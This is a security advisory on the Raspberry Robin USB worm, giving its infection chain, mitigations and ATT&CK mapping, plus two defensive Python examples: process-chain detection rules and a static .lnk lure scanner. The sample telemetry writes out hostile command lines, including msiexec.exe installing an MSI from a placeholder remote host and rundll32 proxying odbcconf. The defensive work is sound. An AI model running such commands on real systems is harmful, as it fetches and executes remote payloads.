Raspberry Robin worm
No specific sector has been identified; observed targeting is mostly localised to Europe.
Severity level: High – Infection may result in the host being joined to the operator’s command and control (C2) infrastructure, follow-on intrusion, and loss of sensitive data. Initial infection requires a physical connection (an infected removable drive).
A relatively new malware family, Raspberry Robin was first observed in September 2021 and has since been used in a growing number of attacks; it has more recently been linked to Russian cybercrime activity (see the Evil Corp assessment below). The worm spreads via infected external drives, relying on the victim opening a lure shortcut on the drive, and abuses Windows Installer (msiexec.exe) to contact compromised QNAP-associated domains and download and install a malicious DLL on the infected device.
The payload behaviour follows five distinct steps:
- Infected external drive is attached to the victim’s computer and the lure shortcut on it is opened
- cmd.exe reads and executes a malicious file from the drive, then launches msiexec.exe, which reaches out to a malicious URL
- The malicious DLL is downloaded and installed from that URL
- rundll32.exe launches a legitimate Windows utility (such as odbcconf.exe) to execute the malicious DLL
- Outbound connections are attempted, usually to Tor nodes
Successful infection by Raspberry Robin joins the victim host to the operator’s C2 infrastructure. This may lead to further attacks and the loss of sensitive data.
Current builds of Microsoft Defender alert on this activity at stage 3 of the chain (the DLL download and install). Logs may also be searched for unexpected msiexec.exe activity, in particular msiexec.exe being passed a remote URL rather than a local package, and for DLL downloads and the associated network connections.
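The following is an added example, not code from this advisory or from Red Canary, showing how the process chain above and the msiexec.exe log search just described can be expressed as detection rules and run over process-creation telemetry. The events, host names, paths and file names below are constructed placeholders (Sysmon Event ID 1 style fields), not real Raspberry Robin indicators; the stage-2 drive-letter check is a heuristic that a production rule would correlate with removable-device events.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (the fields Sysmon Event ID 1 provides)."""
    pid: int
    ppid: int
    image: str     # full path of the new process
    cmdline: str   # command line of the new process

# Constructed sample telemetry modelling stages 2-4 of the chain plus benign noise.
# Host names, paths and file names are placeholders, not real indicators.
SAMPLE_EVENTS: List[ProcEvent] = [
    ProcEvent(1000, 900, r"C:\Windows\explorer.exe", "explorer.exe"),
    # Stage 2a: the lure .lnk runs cmd.exe against a file on the removable drive (E:)
    ProcEvent(1100, 1000, r"C:\Windows\System32\cmd.exe", r'cmd.exe /R "E:\rEcOvErY"'),
    # Stage 2b: cmd.exe launches msiexec.exe to fetch the payload from a remote host
    ProcEvent(1200, 1100, r"C:\Windows\System32\msiexec.exe",
              'msiexec.exe /Q /I "http://qnap-host.invalid:8080/update/abc.msi"'),
    # Stage 4: rundll32.exe proxies execution through odbcconf.exe to load the DLL
    ProcEvent(1300, 1200, r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe SHELL32.DLL,ShellExec_RunDLLA odbcconf.exe -f C:\ProgramData\payload.rsp"),
    # Benign noise: a local MSI install and an ordinary rundll32.exe control-panel call
    ProcEvent(2000, 1000, r"C:\Windows\System32\msiexec.exe",
              r'msiexec.exe /i "C:\Users\alice\Downloads\7zip.msi"'),
    ProcEvent(2100, 1000, r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl"),
]

NON_SYSTEM_DRIVE = re.compile(r"(?<![A-Za-z])[D-Zd-z]:\\")   # any drive letter other than C:
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
PROXY_LOLBINS = ("odbcconf.exe", "fodhelper.exe", "regsvr32.exe")

def image_name(ev: ProcEvent) -> str:
    return ev.image.rsplit("\\", 1)[-1].lower()

def rule_cmd_reads_removable(ev: ProcEvent) -> bool:
    """Heuristic for stage 2a: cmd.exe executing a file from a non-system drive letter."""
    return image_name(ev) == "cmd.exe" and NON_SYSTEM_DRIVE.search(ev.cmdline) is not None

def rule_msiexec_remote_install(ev: ProcEvent) -> bool:
    """Stage 2b/3: msiexec.exe told to install a package from an http(s) URL."""
    cl = ev.cmdline.lower()
    return (image_name(ev) == "msiexec.exe" and REMOTE_URL.search(cl) is not None
            and ("/i" in cl or "-i" in cl))

def rule_rundll32_proxy(ev: ProcEvent) -> bool:
    """Stage 4: rundll32.exe launching another proxy-execution binary (T1218)."""
    cl = ev.cmdline.lower()
    return image_name(ev) == "rundll32.exe" and any(b in cl for b in PROXY_LOLBINS)

RULES = {
    "T1091/T1059.003 cmd.exe executes file from removable drive": rule_cmd_reads_removable,
    "T1218.007 msiexec.exe installs package from remote URL": rule_msiexec_remote_install,
    "T1218.011 rundll32.exe proxies odbcconf/fodhelper/regsvr32": rule_rundll32_proxy,
}

def evaluate(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Return (pid, rule name) for every event that matches a rule."""
    return [(ev.pid, name) for ev in events for name, rule in RULES.items() if rule(ev)]

def chained_infections(events: List[ProcEvent]) -> List[int]:
    """Return pids of remote msiexec installs whose ancestry contains a cmd.exe
    launched from a removable drive: the stage-2 chain rather than isolated noise."""
    by_pid: Dict[int, ProcEvent] = {ev.pid: ev for ev in events}
    chained = []
    for ev in events:
        if not rule_msiexec_remote_install(ev):
            continue
        parent, seen = by_pid.get(ev.ppid), set()
        while parent is not None and parent.pid not in seen:   # guard against pid-reuse loops
            seen.add(parent.pid)
            if rule_cmd_reads_removable(parent):
                chained.append(ev.pid)
                break
            parent = by_pid.get(parent.ppid)
    return chained

if __name__ == "__main__":
    for pid, name in evaluate(SAMPLE_EVENTS):
        print(f"pid {pid}: {name}")
    print("msiexec pids reached via removable-drive cmd.exe:", chained_infections(SAMPLE_EVENTS))
```

The per-event rules are noisy on their own (administrators do run msiexec.exe against URLs); the parent-chain correlation in `chained_infections` is what turns them into a high-confidence stage-2 alert.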
Containment, Mitigations & Remediations
Correct cyber hygiene measures are key to countering this threat. Unknown external media devices should never be connected to a system without proper measures in place. If you need to see what is on an unknown drive, it is recommended that this is done first inside an isolated virtual machine sandbox, in case malicious files are present, so that any malware on the drive cannot spread to other systems.
Additionally, it is strongly recommended that customers have effective antivirus installed so that threats such as this are detected and stopped before damage can be done.
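When a drive is examined in a sandbox, the shortcut (.lnk) file that Raspberry Robin relies on can be triaged statically rather than opened. The following is an added example, not code from this advisory or from Red Canary: it parses the StringData section of Windows Shell Link files (MS-SHLLINK) and flags any shortcut that launches cmd.exe against another file on the same drive. The drive listing, file names and shortcut contents are constructed in memory here; `build_lnk` exists only to create that sample and produces a minimal shortcut without the IDList or LinkInfo a real one carries.

```python
import re
import struct
from typing import Dict, List, Optional

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # 00021401-0000-0000-C000-000000000046
HAS_ID_LIST, HAS_LINK_INFO = 0x01, 0x02
HAS_NAME, HAS_REL_PATH, HAS_WORK_DIR, HAS_ARGS, HAS_ICON = 0x04, 0x08, 0x10, 0x20, 0x40
IS_UNICODE = 0x80
CMD_RE = re.compile(r"\bcmd(\.exe)?\b")

def parse_lnk(data: bytes) -> Optional[Dict[str, str]]:
    """Return the StringData fields of a .lnk file, or None if the bytes are not a shortcut."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        return None
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = 0x4C                                    # end of the fixed-size ShellLinkHeader
    if flags & HAS_ID_LIST:                       # skip LinkTargetIDList (u16 size + list)
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                     # skip LinkInfo (u32 total size, self-inclusive)
        pos += struct.unpack_from("<I", data, pos)[0]
    fields: Dict[str, str] = {}
    for bit, name in ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                      (HAS_WORK_DIR, "working_dir"), (HAS_ARGS, "arguments"), (HAS_ICON, "icon")):
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, no terminator
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le", "replace")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("cp1252", "replace")
            pos += count
    return fields

def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Construct a minimal Unicode shortcut carrying only RelativePath and Arguments (sample input)."""
    flags = HAS_REL_PATH | HAS_ARGS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIiIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, 1, 0, 0, 0, 0)   # attrs, 3 timestamps, size, icon, SW_SHOWNORMAL, ...
    def s(text: str) -> bytes:
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + s(relative_path) + s(arguments)

def is_lure(fields: Dict[str, str], other_files: List[str]) -> bool:
    """A shortcut is a lure if it launches cmd.exe and names another file on the drive
    (the cmd.exe /R <file> pattern), i.e. it is not the folder/drive link it pretends to be."""
    target = (fields.get("relative_path", "") + " " + fields.get("arguments", "")).lower()
    if CMD_RE.search(target) is None:
        return False
    return any(name.lower() in target for name in other_files)

def triage_drive(listing: Dict[str, bytes]) -> List[str]:
    """listing maps file name -> contents; returns names of .lnk files judged to be lures."""
    flagged = []
    for name, data in listing.items():
        if not name.lower().endswith(".lnk"):
            continue
        fields = parse_lnk(data)
        if fields is not None and is_lure(fields, [n for n in listing if n != name]):
            flagged.append(name)
    return flagged

# Constructed drive listing: one lure shortcut plus its obfuscated payload file, and benign files.
SAMPLE_DRIVE: Dict[str, bytes] = {
    "USB Drive (16GB).lnk": build_lnk(r"..\..\..\Windows\System32\cmd.exe", '/R "rEcOvErY"'),
    "rEcOvErY": b"placeholder for the obfuscated script the shortcut executes\r\n",
    "holiday photos.lnk": build_lnk(r"..\photos\2021", ""),
    "notes.txt": b"nothing to see here\r\n",
}

if __name__ == "__main__":
    print("lure shortcuts:", triage_drive(SAMPLE_DRIVE))
```

To run this against a real drive mounted read-only in the sandbox, read each file into the listing dictionary instead of using `SAMPLE_DRIVE`; the parser never executes anything, so the shortcut can be inspected without triggering stage 2.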
Indicators of Compromise
Raspberry Robin reported hash values:
Raspberry Robin associated IPs:
Raspberry Robin has been spreading across Europe since its initial discovery at the tail end of 2021. The spread of this malware has been relatively slow, highly likely due to its deployment method, which needs a physical connection to function.
Investigation findings suggest that the Russian cybercrime gang known as Evil Corp is highly likely using Raspberry Robin infrastructure to carry out their latest wave of attacks. However, based on current reporting, it is unlikely that Raspberry Robin is exclusive to Evil Corp.
MITRE ATT&CK Techniques
T1036 – Masquerading
T1091 – Replication Through Removable Media
T1059.003 – Command and Scripting Interpreter: Windows Command Shell
T1548.002 – Abuse Elevation Control Mechanism: Bypass User Account Control
T1218.011 – System Binary Proxy Execution: Rundll32
T1218.008 – System Binary Proxy Execution: Odbcconf
T1218.007 – System Binary Proxy Execution: Msiexec
T1218.010 – System Binary Proxy Execution: Regsvr32
T1574.002 – Hijack Execution Flow: DLL Side-Loading
T1071.001 – Application Layer Protocol: Web Protocols
T1105 – Ingress Tool Transfer
References
Red Canary – Raspberry Robin Blog
Cisco Blogs – Raspberry Robin